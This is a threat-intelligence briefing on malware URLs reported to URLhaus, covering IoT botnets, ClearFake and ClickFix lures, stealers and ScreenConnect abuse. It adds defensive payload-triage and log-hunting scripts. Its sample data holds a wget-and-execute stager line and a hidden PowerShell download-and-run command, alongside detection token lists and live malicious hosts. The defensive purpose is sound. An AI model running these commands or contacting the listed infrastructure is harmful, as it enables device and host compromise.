This briefing covers threat intelligence for May 3, 2026, focusing exclusively on malware distribution infrastructure identified through URLhaus reporting. The analysis reveals 49 malicious URLs associated with multiple ongoing malware campaigns, with particular emphasis on IoT-targeting botnets and social engineering frameworks. No critical vulnerabilities, KEV additions, or infrastructure seizure events were reported during this period.
The threat landscape for this date is dominated by three malware families: the Mozi botnet (10 URLs), Mirai variants (17 URLs), and the ClearFake social engineering framework (13 URLs). Additional threats include LummaStealer, CoinMiner, and ClickFix campaigns. The prevalence of IoT-targeting malware indicates sustained efforts by threat actors to compromise embedded devices and routers across multiple CPU architectures. ClearFake relies on fake browser update prompts to get users to execute malicious PowerShell, while the ConnectWise ScreenConnect downloads show continued use of legitimate remote administration tools for persistent access.
Botnet activity targeting IoT devices and embedded systems across multiple architectures dominates this period, primarily Mozi and Mirai variants.
Ten Mozi botnet distribution URLs were identified, all serving MIPS builds. Mozi is a Mirai-derived botnet that uses a DHT-based peer-to-peer network for command and control and propagates through routers and IoT devices with weak Telnet credentials or unpatched remote code execution flaws. The distribution infrastructure sits in Asian-registered IP ranges (27.x.x.x, 123.x.x.x, 110.x.x.x, 39.x.x.x), which reflects where the serving hosts are allocated, not necessarily where the operators are.
Seventeen Mirai variant URLs were detected on the 176.65.139.x subnet, with builds for ARM, MIPS, x86, PowerPC, SPARC, ARC, and M68K. The 'iran.*' naming of the binaries is a label chosen by the operator and should not be read as evidence of targeting or attribution. Distribution follows the usual Mirai pattern: a shell-script stager run on the compromised device downloads and executes every architecture-specific binary in turn, and the one matching the host CPU survives.
Secondary Mirai distribution identified on 80.67.33.209:54118 and related ELF payloads on 80.241.218.210 with 'wowiloveyou' campaign markers and 176.65.139.165 hosting MIPS variants.
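When pulling a multi-architecture payload set like the 'iran.*' and MIPS builds above, the first triage question is which CPU each file targets and which downloads are not ELF at all (the shell-script stager, an HTML error page). The following script is an added example, not code from the briefing or from URLhaus: it reads the ELF identification bytes and e_machine field from the first 20 bytes of each file. The sample set is constructed; the file names follow the briefing's 'iran.*' convention, but the suffixes, the 198.51.100.7 stager host (TEST-NET-2) and the header bytes are assumptions made for the example.

```python
"""Architecture triage for multi-arch ELF botnet payloads (added example)."""
import struct

ELF_MAGIC = b"\x7fELF"

# e_machine values from the ELF ABI; subset seen in IoT botnet payloads.
E_MACHINE = {
    2: "SPARC",
    3: "x86",
    4: "M68K",
    8: "MIPS",
    20: "PowerPC",
    21: "PowerPC64",
    40: "ARM",
    42: "SuperH",
    45: "ARC",
    62: "x86-64",
    93: "ARC Compact",
    183: "AArch64",
}

STAGER_TOKENS = ("#!", "wget ", "curl ", "tftp ", "busybox ")


def _looks_like_stager(data: bytes) -> bool:
    """Heuristic: printable ASCII that shells out to a downloader."""
    try:
        text = data[:512].decode("ascii")
    except UnicodeDecodeError:
        return False
    if not all(ch.isprintable() or ch in "\r\n\t" for ch in text):
        return False
    return any(tok in text for tok in STAGER_TOKENS)


def triage_payload(data: bytes) -> dict:
    """Classify a payload from its header bytes.

    Returns {'kind': 'elf', 'bits', 'endian', 'arch'} for ELF files,
    {'kind': 'script'} for downloader stagers, {'kind': 'truncated'} for an
    ELF magic with no usable header, and {'kind': 'other'} otherwise.
    """
    if not data.startswith(ELF_MAGIC):
        return {"kind": "script"} if _looks_like_stager(data) else {"kind": "other"}
    if len(data) < 20:
        return {"kind": "truncated"}
    bits = {1: 32, 2: 64}.get(data[4])        # EI_CLASS
    endian = {1: "little", 2: "big"}.get(data[5])  # EI_DATA
    if bits is None or endian is None:
        # Corrupt EI_CLASS/EI_DATA: ELF magic, but not a header we can trust.
        return {"kind": "elf", "bits": bits, "endian": endian, "arch": "unknown"}
    # e_type at offset 16 and e_machine at offset 18, in the file's own byte order.
    fmt = "<HH" if endian == "little" else ">HH"
    _e_type, e_machine = struct.unpack_from(fmt, data, 16)
    arch = E_MACHINE.get(e_machine, f"unknown (e_machine={e_machine})")
    return {"kind": "elf", "bits": bits, "endian": endian, "arch": arch}


def triage_many(samples: dict) -> dict:
    """Triage a name -> bytes mapping, e.g. one entry per downloaded URL."""
    return {name: triage_payload(blob) for name, blob in samples.items()}


def _elf_header(bits: int, endian: str, machine: int) -> bytes:
    """Constructed 20-byte ELF header prefix for the samples below (not a real file)."""
    ident = ELF_MAGIC + bytes([1 if bits == 32 else 2, 1 if endian == "little" else 2, 1])
    ident += bytes(9)  # EI_OSABI, EI_ABIVERSION and padding bring e_ident to 16 bytes
    fmt = "<HH" if endian == "little" else ">HH"
    return ident + struct.pack(fmt, 2, machine)  # e_type=ET_EXEC, e_machine


# Constructed sample set (assumption): one header per architecture plus the
# stager and an error page a dead URL would return.
SAMPLES = {
    "iran.arm": _elf_header(32, "little", 40),
    "iran.mips": _elf_header(32, "big", 8),
    "iran.mpsl": _elf_header(32, "little", 8),
    "iran.x86": _elf_header(32, "little", 3),
    "iran.ppc": _elf_header(32, "big", 20),
    "iran.spc": _elf_header(32, "big", 2),
    "iran.arc": _elf_header(32, "little", 45),
    "iran.m68k": _elf_header(32, "big", 4),
    "bins.sh": b"#!/bin/sh\ncd /tmp; wget http://198.51.100.7/iran.arm; chmod +x iran.arm; ./iran.arm\n",
    "index.html": b"<html><body>404 Not Found</body></html>",
}

if __name__ == "__main__":
    for name, result in triage_many(SAMPLES).items():
        print(f"{name:12} {result}")
```

Endianness is read from EI_DATA before e_machine is decoded, which is what separates a big-endian MIPS build from a little-endian one ('mpsl' in the usual Mirai naming); the two need different emulation targets even though they share an e_machine value.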
ClearFake framework and information stealing malware actively distributed through compromised infrastructure and social engineering techniques.
Thirteen ClearFake distribution URLs were identified across multiple domains (woodfor.lat, toorout.lat, agilelid.lat), each serving the same UUID path (9fd51fb7-b3ad-4c8f-bf05-b5423d14e06c); reuse of one identifier across domains suggests a single operator rotating throwaway domains in front of one backend. The framework injects a fake browser update prompt into compromised sites and walks the visitor through running a malicious PowerShell command, a social engineering chain rather than an exploit.
The LummaStealer infostealer was identified on 176.65.139.141 distributing a bot_x86.exe variant. LummaStealer is known for credential harvesting, browser data theft, and cryptocurrency wallet targeting. The host sits in the same 176.65.139.x subnet as the Mirai distribution servers, so the same hosting range is serving both Windows and IoT payloads during this period.
A ClickFix campaign was identified using the domain sandman.lat for PowerShell-based payload delivery. ClickFix lures present a fake error or verification page that copies a command to the clipboard and instructs the user to paste it into the Windows Run dialog or a terminal, so the user, not an exploit, launches PowerShell; the resulting process typically has explorer.exe as its parent, which is a useful detection pivot.
Miscellaneous malware distribution includes cryptocurrency miners, Amadey-dropped payloads, and ConnectWise ScreenConnect abuse.
Amadey dropper infrastructure was detected on 62.60.226.140 distributing a secondary payload (RMRcoQ0.exe). Amadey is a modular loader commonly used as an initial-access stage for follow-on deployment of infostealers and ransomware.
Cryptocurrency mining malware was distributed as a fake screensaver file (Photo.scr) from 176.65.139.124:8081. A .scr file is an ordinary PE executable that Windows runs on double-click exactly as it would an .exe; the extension only lowers user suspicion and evades filters that block .exe but not .scr, so mail and proxy controls should treat the two identically.
Four URLs were identified distributing ConnectWise ScreenConnect clients from suspicious infrastructure (192.159.99.39, 185.241.208.243:9090). Legitimate remote administration tools are frequently abused by threat actors for persistent remote access and command execution. Because the client binary itself is signed vendor software, detection has to key on the instance it was downloaded from or calls back to rather than on the file, which means maintaining an allowlist of sanctioned ScreenConnect hosts.
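The ClearFake, ClickFix and ScreenConnect findings above each reduce to a pattern a defender can hunt for in existing telemetry: a bare UUID path on a .lat domain, PowerShell launched from the shell with download-and-execute flags, and a ScreenConnect client fetched from an instance the organization does not own. The script below is an added example, not part of the briefing or of any vendor's detection content. It runs three such rules over JSON-lines events. The domains, the UUID and the 185.241.208.243:9090 host come from the briefing; the event schema, the explorer.exe parent heuristic, the sanctioned ScreenConnect host support.example.com and all sample lines are constructed assumptions for this example.

```python
"""Hunting the ClearFake, ClickFix and ScreenConnect patterns in telemetry (added example)."""
import json
import re
from urllib.parse import urlsplit

# ClearFake: a bare UUID as the whole URL path, on the .lat domains reported.
UUID_PATH = re.compile(
    r"^/[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}/?$", re.I
)
CLEARFAKE_TLD = ".lat"

# ClickFix: PowerShell spawned from the shell (the Run dialog gives explorer.exe
# as parent) with download-and-execute flags. Two or more tokens are required
# so ordinary interactive or scripted admin use stays out of the results.
CLICKFIX_PARENTS = {"explorer.exe"}
CLICKFIX_IMAGES = {"powershell.exe", "pwsh.exe"}
CLICKFIX_TOKENS = (
    "-w hidden", "-windowstyle hidden", "-enc", "-encodedcommand",
    "iex", "invoke-expression", "irm ", "iwr ", "invoke-webrequest", "-nop",
)

# ScreenConnect: the client is legitimate software; what matters is which
# instance served it. Assumption for this example: one sanctioned host.
SCREENCONNECT_CLIENT = re.compile(r"screenconnect\.clientsetup\.(exe|msi)$", re.I)
APPROVED_SC_HOSTS = {"support.example.com"}


def check_proxy(ev: dict):
    """Return a rule name for a web-proxy record, or None."""
    parts = urlsplit(ev["url"])
    host = (parts.hostname or "").lower()
    if host.endswith(CLEARFAKE_TLD) and UUID_PATH.match(parts.path):
        return "ClearFake UUID path"
    if SCREENCONNECT_CLIENT.search(parts.path) and host not in APPROVED_SC_HOSTS:
        return "ScreenConnect client from unapproved host"
    return None


def check_process(ev: dict):
    """Return a rule name for a process-creation record, or None."""
    image = ev["image"].lower().rsplit("\\", 1)[-1]
    parent = ev["parent"].lower().rsplit("\\", 1)[-1]
    cmd = ev["cmdline"].lower()
    if image in CLICKFIX_IMAGES and parent in CLICKFIX_PARENTS:
        hits = [tok for tok in CLICKFIX_TOKENS if tok in cmd]
        if len(hits) >= 2:
            return "ClickFix PowerShell"
    return None


def hunt(lines):
    """Run the rules over JSON-lines events; one finding per match, in input order."""
    findings = []
    for n, line in enumerate(lines, 1):
        line = line.strip()
        if not line:
            continue
        ev = json.loads(line)
        rule = check_proxy(ev) if ev["type"] == "proxy" else check_process(ev)
        if rule:
            findings.append({
                "line": n,
                "rule": rule,
                "source": ev.get("src") or ev.get("host"),
                "evidence": ev.get("url") or ev.get("cmdline"),
            })
    return findings


def hunt_text(text: str):
    return hunt(text.strip().splitlines())


# Constructed sample telemetry (not real logs): two ClearFake lookalikes that
# must not fire, a ClickFix launch beside a benign PowerShell start, and a
# ScreenConnect download from the reported host beside one from the approved instance.
SAMPLE_LOG = r"""
{"type": "proxy", "src": "10.0.0.5", "url": "http://woodfor.lat/9fd51fb7-b3ad-4c8f-bf05-b5423d14e06c"}
{"type": "proxy", "src": "10.0.0.6", "url": "https://www.example.com/9fd51fb7-b3ad-4c8f-bf05-b5423d14e06c"}
{"type": "proxy", "src": "10.0.0.7", "url": "http://toorout.lat/"}
{"type": "process", "host": "WS-01", "parent": "C:\\Windows\\explorer.exe", "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "cmdline": "powershell -w hidden -nop -c \"iex (irm http://sandman.lat/)\""}
{"type": "process", "host": "WS-02", "parent": "C:\\Windows\\explorer.exe", "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "cmdline": "powershell.exe"}
{"type": "proxy", "src": "10.0.0.9", "url": "http://185.241.208.243:9090/Bin/ScreenConnect.ClientSetup.exe"}
{"type": "proxy", "src": "10.0.0.10", "url": "https://support.example.com/Bin/ScreenConnect.ClientSetup.exe"}
"""

if __name__ == "__main__":
    for f in hunt_text(SAMPLE_LOG):
        print(f"line {f['line']:>2}  {f['rule']:<40} {f['source']}  {f['evidence']}")
```

The ClickFix rule deliberately requires the explorer.exe parent plus two command-line tokens; variants that go through cmd.exe or mshta.exe need their own parent and image sets, and the token list will need tuning against the environment's normal PowerShell use. The ScreenConnect rule is only as good as the allowlist, which is the point made above: the binary is legitimate, the instance is the indicator.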